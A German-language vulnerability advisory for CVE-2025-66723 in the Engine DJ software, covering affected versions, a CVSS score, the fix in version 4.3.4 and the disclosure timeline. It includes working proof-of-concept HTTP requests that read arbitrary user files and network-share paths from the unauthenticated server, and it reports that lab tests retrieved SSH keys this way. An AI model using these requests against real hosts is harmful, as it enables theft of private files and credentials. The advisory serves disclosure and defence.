
CVE-2025-66723: inMusic Brands Engine DJ >=3.0.0 bis <4.3.4 legt lokale und Netzwerk-Dateien für externe Parteien offen
Die Software Engine DJ von inMusic Brands enthält einen eingebetteten HTTP-Server zur Übertragung von Medienbibliotheksdateien an verbundene Clients im Netzwerk. Die Mediendateien werden über Dateisystempfade referenziert. Engine DJ authentifiziert Clients nicht und schränkt angeforderte Dateisystempfade nicht ein. Dadurch kann ein Angreifer vertrauliche lokale oder netzwerkerreichbare Dateien von betroffenen Systemen exfiltrieren.
Ein Angreifer benötigt lediglich Netzwerkzugriff auf den betroffenen Host; keine Authentifizierung oder vorherige Interaktion ist erforderlich.
Engine DJ v4.3.4, veröffentlicht am 17. November 2025, enthält eine Abhilfe. Benutzer werden aufgefordert, so schnell wie möglich zu aktualisieren.
CVSS v3.1 Basisschweregrad: 7,5 (Hoch)
Vektor: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Engine DJ >=3.0.0, <4.3.4, auf allen Plattformen (macOS, Windows).
Speziell getestete Versionen, die als betroffen/verwundbar befunden wurden, macOS und Windows:
3.0.0, 3.0.1, 3.1.0, 3.1.1, 3.2.0, 3.3.0, 3.4.0,
4.0.0, 4.0.1, 4.1.0, 4.2.0, 4.2.1, 4.3.0
Speziell getestete Versionen, die als nicht betroffen befunden wurden, macOS und Windows:
2.0.0, 2.0.1, 2.0.2, 2.1.0, 2.2.0, 2.2.1, 2.2.2, 2.3.0, 2.3.1, 2.3.2, 2.4.0,
4.3.4
Beim Start bindet Engine DJ an Port :50020 auf jeder IPv4-Netzwerkschnittstelle außer localhost.
Clients sollen einen separaten gRPC-Dienst auf Port :50010 verwenden, um Zugriff anzufordern und nach Mediendateien zu suchen. Sobald der gewünschte Medienpfad gefunden wurde, stellt der Client eine HTTP-Anfrage zurück auf Port :50020:
GET /download/%3CC%3A%2FMusic%2Ftest.flac%3E HTTP/1.1
Host: 192.0.2.1:50020
User-Agent: EngineOS/1.0 DenonDJ
Accept: */*
HTTP/1.1 200 OK
Content-Length: 37517194
Content-Type: application/octet-stream
Keep-Alive: timeout=5, max=5
…
Hinweis: Beim Dekodieren ist der GET-Pfad oben einfach:
/download/<C:/Music/test.flac>
Es ist nicht erforderlich, diese Zeichen bei Anfragen zu percent-codieren.
Ein Angreifer kann alles anfordern, was für den Benutzer zugänglich ist, unter dem die Engine DJ-Software läuft, solange der Pfad dem Angreifer bekannt ist. In diesem Beispiel wird eine Textdatei zum Testen verwendet:
GET /download/<C:/Users/USERNAME/test.txt> HTTP/1.1
Host: 192.0.2.1:50020
HTTP/1.1 200 OK
Content-Length: 40
Content-Type: application/octet-stream
Keep-Alive: timeout=5, max=5
INSECURE...
From text file test.txt
Zu den während der Proof-of-Concept-Labortests abgerufenen Dateien gehörten private SSH-Schlüssel und Umgebungsdateien.
Angeforderte Pfade sind nicht auf lokale Dateien beschränkt. Es wurde festgestellt, dass auch Netzwerkpfade zugänglich sind, abhängig von den Berechtigungen des Hosts:
/download/<//EXAMPLE-SERVER/C$/secret.txt>
Glücklicherweise gibt es keinen Access-Control-Allow-Origin-Header oder verwandte Header in der Antwort des Servers. Daher sind Dateien nicht von normalen webbasierten Clients aus zugänglich. Bestimmte Browsererweiterungen oder Flags können verwendet werden, um die Beschränkungen für Cross-Origin-Anfragen zu lockern, sind aber unüblich.
IPv4-Netzwerkverkehr auf Port :50020 kann verwendet werden, um zu vermuten, dass Engine DJ in Gebrauch ist, aber es zeigt nicht an, ob ein Host verwundbar ist. Der eingebettete Server identifiziert sich nicht in seinen Antworten, und es scheint keinen messbaren Unterschied zwischen verwundbaren und nicht verwundbaren Versionen von Engine DJ zu geben. Daher scheint es extern nicht möglich zu sein, festzustellen, ob ein Host verwundbar ist, außer durch den Versuch, eine Datei anzufordern, von der bekannt ist, dass sie existiert.
Unmittelbar nach der Entdeckung wurde inMusic Brands über ihre technischen Supportkanäle über die Schwachstelle informiert. Die Reaktion war professionell und schnell, und eine Abhilfe für das Problem wurde als Teil von v4.3.4 am 17. November 2025 für sowohl macOS als auch Windows veröffentlicht.
Während Mediendateien weiterhin ohne Authentifizierung/Autorisierung heruntergeladen werden können, sind die anforderbaren Pfade nun auf eine Whitelist gesetzt, sodass der Versuch, auf eine Datei außerhalb der Medienbibliothek zuzugreifen, nicht möglich ist. Benutzer erhalten eine 403-Antwort für alles, was nicht auf der Whitelist steht, selbst wenn es nicht existiert.
GET /download/<C:/Users/USERNAME/test.txt> HTTP/1.1
Host: 192.0.2.1:50020
HTTP/1.1 403 Forbidden
Content-Length: 17
Content-Type: text/html
Keep-Alive: timeout=5, max=5
…
Offizielle Downloads der neuesten Engine DJ-Versionen finden Sie auf der offiziellen Engine DJ-Website:
Bei Fragen zu diesem Bericht wenden Sie sich bitte an den Autor:
Brad Isbell, AudioPump, Inc. [email protected]